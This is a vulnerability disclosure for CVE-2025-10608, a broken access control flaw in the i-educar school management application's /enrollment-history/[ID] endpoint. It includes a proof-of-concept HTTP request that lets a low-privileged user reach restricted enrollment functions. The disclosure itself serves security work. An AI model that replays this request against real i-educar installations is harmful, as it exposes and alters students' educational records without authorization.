CVE-2025-10608: Broken Access Control in /enrollment-history/[ID] Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10608

Summary

A Broken Access Control vulnerability was identified in the /enrollment-history/[ID] endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.

Details

Vulnerable Endpoint: GET /enrollment-history/[ID]
Authentication: Required

The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .

PoC

• Authenticate as a non-privileged user.

• Send the following request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

GET /enrollment-history/206 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206
Cookie: i_educar_session=[low_privileged cookie]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

• We could observe that we have access to the page and to the function to sign students from classes. And, this user, should not do that.

Impact

Broken Access Control vulnerabilities can have severe consequences, including:

• Unauthorized access to restricted functionality;
• Escalation of privileges for low-level users;
• Exposure of sensitive data and potential system compromise;
• Loss of confidentiality and integrity of educational records;
• Reputational damage to the organization.

Reference

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10608.md

Finder

Marcelo Queiroz

By: CVE-Hunters